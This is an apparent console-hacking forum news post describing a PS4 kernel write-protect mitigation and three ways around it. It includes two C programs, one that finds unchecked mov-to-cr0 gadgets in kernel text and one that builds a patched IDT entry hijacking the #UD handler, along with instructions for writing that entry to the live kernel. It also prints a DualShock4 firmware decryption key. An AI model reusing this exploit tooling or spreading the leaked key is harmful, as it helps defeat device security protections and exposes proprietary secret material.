PS4 Jailbreaking · Thread starter PSXHAX · Start date Aug 8, 2021 at 4:03 PM · 14,623 · 21
In PS4Scene news this weekend, developer @CelesteBlue (Github / Twitter) detailed a PS4 CR0.WP (Write Protect) kernel security bypass, applicable since at least PS4 OFW 6.51, on the PSDevWiki working exploits page.

This follows the PS4 Jailbreak 2 updates, the latest GoldHEN v1.1 release, the PS4 Synacktiv Presentation SSTIC 2021 Recap, the PS4 / PS5 SMAP Bypass by m00nbsd and new PS4 Fake PKGs (FPKGs) for those interested.

Below are the technical details for scene devs from PSDevWiki.com, as follows:

CR0.WP protection

At least since firmware 6.51 Sony has instrumented every instruction that writes to the CR0 register with a check for attempts to clear CR0.WP (Write Protect, bit 16 of CR0, hence the 0x10000 mask below). Clearing CR0.WP is necessary for patching the read-only kernel text. This is what it looks like in the 6.51 kernel:
Code:
a1b79:       0f 22 c0                mov    cr0,rax
a1b7c:       48 a9 00 00 01 00       test   rax,0x10000
a1b82:       75 02                   jne    a1b86 <-- skip the next instruction if CR0.WP is not cleared
a1b84:       0f 0b                   ud2    <-- #UD exception, causes a kernel panic
a1b86:       c3                      ret
Note that the check is placed after the write, so a ROP gadget that points straight at the mov still falls through into the verification instead of skipping it.
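To make the pattern concrete, here is an added example (not code from the PSDevWiki page or from CelesteBlue): a small scanner that walks a chunk of kernel text, finds every "mov cr0, r64" encoding (0f 22 /r with the reg field selecting cr0) and reports whether it is followed by the 6.51-style check, so an instrumented write can be told apart from an unchecked gadget. It also catches the unintended encodings that live inside immediates of other instructions, such as the "call $+0x220f1c" case. The SAMPLE bytes are constructed for the demonstration; the scanner treats a REX byte directly before the opcode as a prefix, which is a simplification a real disassembler would refine.

```c
/* Added example: scan for mov-to-cr0 encodings and classify them as
 * instrumented (followed by test rax,0x10000 ; jne +2 ; ud2) or unchecked.
 * Not from the PSDevWiki page; SAMPLE is constructed. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

enum cr0_kind { CR0_CHECKED = 1, CR0_UNCHECKED = 2 };

struct cr0_hit {
    size_t off;          /* offset of the 0f opcode byte */
    int src_reg;         /* source GPR, 0 = rax ... 15 = r15 */
    enum cr0_kind kind;
};

/* The WP check Sony emits after each write (6.51 kernel listing). */
static const uint8_t WP_CHECK[] = {
    0x48, 0xa9, 0x00, 0x00, 0x01, 0x00, /* test rax, 0x10000 (CR0.WP is bit 16) */
    0x75, 0x02,                         /* jne  +2                              */
    0x0f, 0x0b                          /* ud2                                  */
};

/* Scan buf for mov cr0, r64; returns the number of hits stored in out. */
size_t find_mov_cr0(const uint8_t *buf, size_t len, struct cr0_hit *out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i + 2 < len && n < max; i++) {
        if (buf[i] != 0x0f || buf[i + 1] != 0x22)
            continue;
        /* For MOV to CRn the mod bits of ModRM are ignored (treated as 11),
         * which is why "0f 22 00" still decodes as mov cr0, rax. */
        uint8_t modrm = buf[i + 2];
        int cr = (modrm >> 3) & 7;
        int rm = modrm & 7;
        /* Immediately preceding REX prefix: REX.R selects cr8, REX.B selects r8-r15.
         * Simplification: a stray 0x4x data byte before 0f 22 is also taken as REX. */
        if (i > 0 && (buf[i - 1] & 0xf0) == 0x40) {
            if (buf[i - 1] & 0x04) cr += 8;
            if (buf[i - 1] & 0x01) rm += 8;
        }
        if (cr != 0)
            continue;    /* writes to cr8 etc. are not our concern */
        out[n].off = i;
        out[n].src_reg = rm;
        out[n].kind = (len - (i + 3) >= sizeof WP_CHECK &&
                       memcmp(buf + i + 3, WP_CHECK, sizeof WP_CHECK) == 0)
                      ? CR0_CHECKED : CR0_UNCHECKED;
        n++;
    }
    return n;
}

/* Constructed text: the instrumented write from the 6.51 listing, the
 * unintended "call $+0x220f1c" gadget, an unchecked mov cr0,rcx, and a
 * mov cr8,rax that must not be reported. */
static const uint8_t SAMPLE[] = {
    0x0f, 0x22, 0xc0,                   /* +0x00 mov cr0, rax        */
    0x48, 0xa9, 0x00, 0x00, 0x01, 0x00, /*       test rax, 0x10000   */
    0x75, 0x02,                         /*       jne +2              */
    0x0f, 0x0b,                         /*       ud2                 */
    0xc3,                               /*       ret                 */
    0xe8, 0x17, 0x0f, 0x22, 0x00,       /* +0x0e call $+0x220f1c, "0f 22 00" at +0x10 */
    0xc3,                               /*       ret                 */
    0x0f, 0x22, 0xc1,                   /* +0x14 mov cr0, rcx (no check at all) */
    0xc3,                               /*       ret                 */
    0x44, 0x0f, 0x22, 0xc0,             /* +0x18 mov cr8, rax (REX.R set) */
};

int main(void)
{
    static const char *names[16] = { "rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi",
                                     "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15" };
    struct cr0_hit hits[16];
    size_t n = find_mov_cr0(SAMPLE, sizeof SAMPLE, hits, 16);
    for (size_t i = 0; i < n; i++)
        printf("+0x%02zx: mov cr0, %-3s  %s\n", hits[i].off, names[hits[i].src_reg],
               hits[i].kind == CR0_CHECKED ? "instrumented (ud2 if WP cleared)"
                                           : "UNCHECKED gadget");
    return 0;
}
```

Run against a dump of the real kernel text, the hits classified as UNCHECKED are the candidates for the first bypass below; the ones classified as CHECKED are the writes the mitigation covers.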

Bypasses (in chronological order):
  • Use an "unintended" mov to cr0 in the middle of another instruction (e.g. the instruction "call $+0x220f1c" (e8 17 0f 22 00) contains an unintended "mov cr0, rax" (0f 22 00) inside its immediate; entering it at the 0f byte executes the write without the check).
  • Use a kernel write to give your process JIT permissions, allocate JIT memory, and put entirely custom code there (avoids the problem altogether, as the mitigation only bites ROP).
  • Since the IDT is writable on FreeBSD and PS4, it is possible to overwrite an exception handler without clearing CR0.WP first. One can overwrite the handler of #UD with a gadget of their choice (a stack pivot, an "add rsp, ... ; ret", or whatever else), and the UD2 instruction in the mitigation code will happily jump to it instead of the real handler, with CR0.WP already cleared. The gadget runs in #UD exception context, with the exception frame the CPU pushed (no error code for #UD) on the stack, which a stack pivot or "add rsp" gadget has to account for.
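For the third bypass, the object being written is a 16-byte 64-bit IDT gate. The following is an added example, not code from the PSDevWiki page or from any PS4 exploit: it parses a gate, swaps only the handler offset for a gadget address while preserving selector, IST and type/DPL/present bits, and computes where in the IDT the #UD entry lives. The IDT base, the original handler and the gadget address are made-up values; a real exploit would read the live entry with its kernel-read primitive and write the patched bytes back with its kernel-write primitive.

```c
/* Added example: build the patched x86-64 IDT gate that redirects #UD to a
 * chosen gadget. Not from the PSDevWiki page; all addresses are constructed. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define IDT_GATE_SIZE 16
#define VEC_UD 6   /* #UD, the vector UD2 raises */

/* Address of a vector's gate inside the IDT. */
uint64_t idt_gate_addr(uint64_t idt_base, unsigned vector)
{
    return idt_base + (uint64_t)vector * IDT_GATE_SIZE;
}

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v & 0xff); p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v)
{
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)((v >> (8 * i)) & 0xff);
}

/* 64-bit gate layout: offset[15:0] | selector | IST | type/attr |
 * offset[31:16] | offset[63:32] | reserved */
uint64_t idt_gate_handler(const uint8_t gate[IDT_GATE_SIZE])
{
    return (uint64_t)rd16(gate) | ((uint64_t)rd16(gate + 6) << 16) | ((uint64_t)rd32(gate + 8) << 32);
}

int idt_gate_present(const uint8_t gate[IDT_GATE_SIZE]) { return (gate[5] & 0x80) != 0; }

/* Replace only the handler offset; selector, IST and type/DPL/P stay as they
 * were, so the CPU still sees a valid kernel-mode gate. */
void idt_gate_set_handler(uint8_t gate[IDT_GATE_SIZE], uint64_t handler)
{
    wr16(gate, (uint16_t)handler);
    wr16(gate + 6, (uint16_t)(handler >> 16));
    wr32(gate + 8, (uint32_t)(handler >> 32));
}

/* Constructed stand-in for the #UD entry as read from the kernel: handler at
 * 0xffffffff80a1c000 (made-up), selector 0x20, IST 0, present interrupt gate. */
static const uint8_t SAMPLE_UD_GATE[IDT_GATE_SIZE] = {
    0x00, 0xc0,             /* offset[15:0]  */
    0x20, 0x00,             /* selector      */
    0x00,                   /* IST           */
    0x8e,                   /* P=1 DPL=0 type=0xe (interrupt gate) */
    0xa1, 0x80,             /* offset[31:16] */
    0xff, 0xff, 0xff, 0xff, /* offset[63:32] */
    0x00, 0x00, 0x00, 0x00  /* reserved      */
};

/* Produce the gate that sends #UD to `gadget`. Returns 0 on success, -1 if the
 * original entry is not a present gate (then the bytes are not what we think). */
int build_ud_hijack(const uint8_t orig[IDT_GATE_SIZE], uint64_t gadget, uint8_t out[IDT_GATE_SIZE])
{
    if (!idt_gate_present(orig))
        return -1;
    memcpy(out, orig, IDT_GATE_SIZE);
    idt_gate_set_handler(out, gadget);
    return 0;
}

int main(void)
{
    uint8_t patched[IDT_GATE_SIZE];
    uint64_t gadget   = 0xffffffff80123456ULL; /* made-up "add rsp, ... ; ret" gadget */
    uint64_t idt_base = 0xffffffff81b40000ULL; /* made-up; take it from IDTR / kernel data */
    if (build_ud_hijack(SAMPLE_UD_GATE, gadget, patched) != 0)
        return 1;
    printf("original #UD handler: %#llx\n", (unsigned long long)idt_gate_handler(SAMPLE_UD_GATE));
    printf("write %d bytes to %#llx, new handler %#llx\n", IDT_GATE_SIZE,
           (unsigned long long)idt_gate_addr(idt_base, VEC_UD),
           (unsigned long long)idt_gate_handler(patched));
    return 0;
}
```

After the patched gate is written over the live entry, the next UD2 reached by the mitigation code (with CR0.WP already cleared) transfers control to the gadget instead of the kernel's #UD handler; the gadget must then deal with the pushed exception frame before the rest of the chain runs.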
Cheers to @HydrogenNGU for passing along this news earlier via Twitter.

PS4 Jedi "MASTER" Key has been documented by Zecoxao.
Code:
Key: 9B03D4FB5FEC1A2373462C45E4BC72A6
This key decrypts DualShock4 Firmwares. Algorithm is AES-128-CBC. Zeroed IV.
 

Comments

maoex1

They talk about at least 6.72, not 8.00. By the way, I am on 7.55. Stupid, but I didn't know at that time about the huge KP issue on 7.55, and almost all games are backported. So I upgraded from 6.72 to 7.55 for nothing, but 10-20 tries to jailbreak and still many kernel panics.
 
